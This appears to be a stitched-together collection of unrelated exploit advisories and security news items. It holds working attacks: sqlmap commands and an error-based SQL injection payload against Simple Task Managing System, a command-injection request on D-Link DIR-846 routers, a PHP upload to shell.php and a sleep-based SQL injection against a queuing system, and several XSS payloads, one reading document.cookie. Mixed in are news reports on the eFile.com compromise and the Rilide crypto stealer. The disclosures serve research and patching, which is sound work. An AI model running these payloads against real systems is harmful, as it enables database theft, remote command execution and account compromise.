Simple Task Managing System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)# Date: 2022-01-09# Exploit Author: Hamdi Sevben# Vendor Homepage: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53# CVE: CVE-2022-40032# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40032https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated------------------------------------------------------------------------------------1. Description:----------------------Simple Task Managing System 1.0 allows SQL Injection via parameters 'login' and 'password' in /TaskManagingSystem/login.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.2. Proof of Concept:----------------------In sqlmap use 'login' parameter or 'password' parameter to dump users table from 'tasker' database. Then run SQLmap to extract the data from the database:sqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "login" --risk="3" --level="3" --method="POST" --data="login=test&password=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dumpsqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "password" --risk="3" --level="3" --method="POST" --data="login=&password=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dump3. Example payload:-----------------------1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%274. Burpsuite request on 'login' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 312Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=P@ssw0rd!5. Burpsuite request on 'password' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 307Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=user&password=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

Simple Task Managing System 1.0 SQL Injection

Categories: News
Categories: Scams
Tags: tax scams

Tags:  efile.com

Tags:  US tax 2023

Tags:  backdoor

Tags:  Trojan

Tags:  Johannes Ullrich

Tags:  MalwareHunterTeam

Tags:  /u/SaltyPotter

Tags:  fake network error notification

Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans.



(Read more...)




The post Visitors of tax return e-file service may have downloaded malware appeared first on Malwarebytes Labs.

The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS' e-file infrastructure and other similar-sounding domains.

As of this writing, eFile.com is clean. Users can access it without worry.

**The attack began 18 days ago**

The incident first arose as a possibility that something might be up with the website. A Reddit user encountered a fake "Network Error" page when accessing www.efile.com_._ The page, as shown below, informed visitors their browser "uses an unsupported protocol," and that they need to click the link it provided to them to update their browser—a known tactic often used by scammers.

This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers. This made Redditors suspect the domain was hijacked. (Source: /u/SaltyPotter, original image cropped to fit)

This, however, is no scam.

Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis.

According to both MalwareHunterTeam and Ullrich, a malformed JS file named _popper.js_ contains encrypted malicious code—meaning it cannot be read plainly. Its purpose is to load another JS script called _update.js_ hosted on an Amazon Web Services (AWS) site. _update.js_ contains code used to display the fake error page.

_popper.js_ is a legitimate file modified to do malicious tasks. Because almost every page within the eForm website loads it, the malicious activities we mentioned are triggered every time a user visits any site page.

_update.js_ also contains two hard-coded download URLs, both served on the malicious domain _infoamanewonliag\[.\]online_. The two payloads are for two specific browsers visitors typically use, Chrome and Firefox.

"So different browsers get different payloads," says Ullrich. Chrome users get a payload named "update.exe" with a valid signature from Sichuan Niurui Science and Technology. Firefox users get "installer.exe." There is no indication if browsers based on Chromium (where Chrome is based) or Quantum (where Firefox is based) could also receive the payloads.

BleepingComputer has independently confirmed the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the illicit domain the payloads were downloaded from.

These executables were written in Python. Malwarebytes detects them as **Trojan.Downloader.Python**.

As of Wednesday, _popper.js_ is free of malicious code.

**The backdoor**

Once users execute the payload, a PHP script runs quietly in the background. BleepingComputer's analysis shows that every 10 seconds, the backdoor script connects to a remote command and control (C2) server to receive one or more tasks to perform on the affected system. These include "executing a command and sending its output back to the attackers or downloading additional files onto the computer."

The backdoor is unsophisticated, but it's enough to give attackers access to the entire system, including company-owned devices.

"The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned," says BleepingComputer.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Visitors of tax return e-file service may have downloaded malware

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Code That has a Vulnerability:

                // Updates an existing category
                if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
    
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                    $image = count($uploadedFile) ? $categoryImage->getFileName(
                        $categoryId,
                        $categoryLang
                    ) : $existingImage;
    
                    $categoryData = [
                        'id' => $categoryId,
                        'lang' => $categoryLang,
                        'parent_id' => $parentId,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $image,
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                    ];
    

Code without that vulnerability:

                // Save a new category
                if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                    $categoryData = [
                        'lang' => $categoryLang,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                    ];
    

Request:

    POST /admin/?action=updatecategory HTTP/2
    Host: roy.demo.phpmyfaq.de
    Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
    Content-Length: 1934
    Origin: https://roy.demo.phpmyfaq.de
    Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="catlang"
    
    en
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="parent_id"
    
    0
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="csrf"
    
    EDITthis
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="existing_image"
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="name"
    
    <script>alert(1)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="description"
    
    </textarea><script>alert(2)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="active"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="show_home"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="user_id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="grouppermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="userpermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="restricted_users"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------14208207025422371582565391486--
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

An arbitrary file upload vulnerability in /admin/ajax.php?action=save_uploads of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Dynamic Transaction Queuing System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: ctg503 team

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin123 (Super Admin account)

Vulnerability url: ip/queuing/admin/ajax.php?action=save\_uploads

Loophole location: Dynamic Transaction Queuing System's "/queuing/admin/ajax.php?action=save\_uploads" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /queuing/admin/ajax.php?action\=save\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/queuing/admin/index.php?page=uploads
Content-Length: 396
Content-Type: multipart/form-data; boundary=---------------------------208633099825036
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
\-----------------------------208633099825036
Content-Disposition: form-data; name="id"
\-----------------------------208633099825036
Content-Disposition: form-data; name="img\[\]"
data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
\-----------------------------208633099825036
Content-Disposition: form-data; name="imgName\[\]"
shell.php
\-----------------------------208633099825036--

The files will be uploaded to this directory \\queuing\\admin\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-26857: bug_report/RCE-1.md at main · ctg503/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/ajax.php?action=login.

Permalink

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ctg503 team

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=login

Vulnerability location: /queuing/admin/ajax.php?action=login, name

dbname =queuing\_db

\[+\] Payload: username=admin' and sleep(5)--+&password=admin // Leak place ---> name

POST /queuing/admin/ajax.php?action\=login HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
username=admin' and sleep(5)--+&password=admin

CVE-2023-26856: bug_report/SQLi-1.md at main · ctg503/bug_report

By Deeba Ahmed
The Chromium-based browsers include Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, and several others.
This is a post from HackRead.com Read the original post: Rilide Malware – New Crypto Stealer Hits Chromium-Based Browsers

Riligy malware is disguised as a legitimate Google Drive extension and allows attackers to capture screenshots, monitor users’ browsing history, and inject malicious scripts to steal funds from cryptocurrency wallets.

The cybersecurity researchers at Trustwave SpiderLabs have disclosed alarming details on a new strain of Rilide malware that targets Chromium-based browsers to steal cryptocurrency funds and monitor users browsing activities.

In the newly discovered campaign, SpiderLabs researchers noticed that threat actors have created legitimate-looking Google Drive extension that hides Rilide malware.

SpiderLabs researchers believe Rilide malware is unique because of its capability of generating dialogues to trick users into giving away their 2FA keys. This is a rare feature that helps the attacker withdraw cryptocurrencies discreetly.

In addition to this, the malware also allows attackers to carry out an extensive range of activities, including capturing screenshots, monitoring users’ browsing history, and injecting malicious scripts to steal funds from cryptocurrency wallets.

The researchers have confirmed that Rilide malware targets Chromium-based browsers, including Microsoft Edge, Google Chrome, and Opera to achieve its malicious objectives.

The fact that Google Drive is being used maliciously is not surprising. A study conducted last year found that 50% of all malicious Office document downloads were from Google Drive. Another study revealed that Apple Safari was the safest browser while Google Chrome was the riskiest browser in 2022.

As for Rilide malware, during their investigation, SpiderLabs researchers detected multiple such extensions for sale in March 2022. They also noted that a portion of Rilie malware source code was recently leaked by someone on an underground hacking forum over payment issues.

This leaked code can swap cryptocurrency wallet addresses from the clipboard with the attacker’s address. Moreover, the C2 address embedded in the Rilide code can identify GitHub repositories belonging to a user named gulantin, which contains the extension’s loader.

**Attack Chain**

Researchers have detected two attack methods to install the malicious extension, Ekipa RAT and Aurora Stealer. Ekipa RAT is distributed through booby-trapped Microsoft Publisher documents, whereas fake Google Ads serve as Aurora Stealer’s distributor.

Their attack chains encourage the execution of a Rust-based loader, which can modify the browsers’ LNK shortcut file and launch the add-on using the “–load-extension” command line switch.

_Infection Chains_ (Trustwave)

Ekipa RAT can carry out targeted attacks. Conversely, Aurora, first spotted in April 2022 on Russian-speaking underground forums, is a Go-based stealer offered as a Malware-as-a-Service (Maas) tool. It can take data from different web browsers, local systems, and cryptocurrency wallets.

“The Rilide stealer is a prime example of the increasing sophistication of malicious browser extensions and the dangers they pose,” the report read.

1.  Malicious Firefox extension phish Gmail credentials
2.  Ad-blocker Chrome extension injected ads in Google
3.  Fake ChatGPT Extension Hijacks Facebook Accounts
4.  Phishing attack uses Google Drive against researchers
5.  Chrome extensions harboring Dormant Colors malware

Rilide Malware – New Crypto Stealer Hits Chromium-Based Browsers

Cross Site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script in the <iframe>src parameter.

Test Environment:  
Firefox Quantum 67.0.3/Chrome 75.0.3770.100/Safari 12.1.1

Description:  
User can use <iframe> src attribute to insert malicious javascript codes, and then execute it.

Reproduce steps

    1. go to https://pandao.github.io/editor.md/en.html or any open editor.md apps
    2. in the edit mode, input the following malicious codes
    

    <iframe src=javascript://%0aalert(document.cookie)>
    

Expected Results  
No malicious javascript codes should be executed

Actual Results  
The malicious codes are executed

CVE-2020-19697: XSS vulnerability found via <iframe> src attribute · Issue #701 · pandao/editor.md

The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

**On what page in the application did you find this issue?**

return hash('sha256', $password . $this\->getPersonId());

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows/xampp

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.27

**What version of SQL Server are you running?**

7.4.27

**What version of ChurchCRM are you running?**

4.5.3

**Weak Salt Implementation**

The following report outlines a vulnerability found in the password storage system. The vulnerability arises from the use of a weak salt in the hashing algorithm, which could allow attackers to crack passwords more easily.

Vulnerable Code:

hash('sha256', $password . $this->getPersonId());

Vulnerability Explanation:  
The salt used in the hashing algorithm is generated by the $this->getPersonId() method. However, the method returns an integer value, which is not random or unique for each password. This makes the salt predictable and weak, and could allow attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

Impact:  
The vulnerability could allow an attacker to crack passwords more easily, which could result in unauthorized access to user accounts and sensitive information.

Recommendation:  
To address this vulnerability, it is recommended to use a more secure and unpredictable salt for each password, such as a random value generated for each password. This will make it more difficult for attackers to crack hashed passwords using precomputed hash tables or dictionary attacks.

CVE-2023-26855: Weak Salt Implementation · Issue #6449 · ChurchCRM/CRM

WordPress Accessibility Help Button plugin version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Accessibility Help Button – StoredCross Site Scripting.# Date: 2-04-2023# Exploit Author: Taliya Bilal- NightHawk# Vendor Homepage: https://wordpress.com/plugins/accessibility-help-button# Version: 1.1# Tested on: Firefox# Contact me: taliyabilal765@gmail.com# Steps to reproduce:1.  Install Accessibility Help Button WordPress plugin and activate.2. Go to Options and on Button Text input field inject XSS payload<script>alert('XSS')</script>3. Fill out the whole form and click the save button below.3. XSS will trigger.#Screenshot:https://freeimage.host/i/HOBXWqg

Tag

#firefox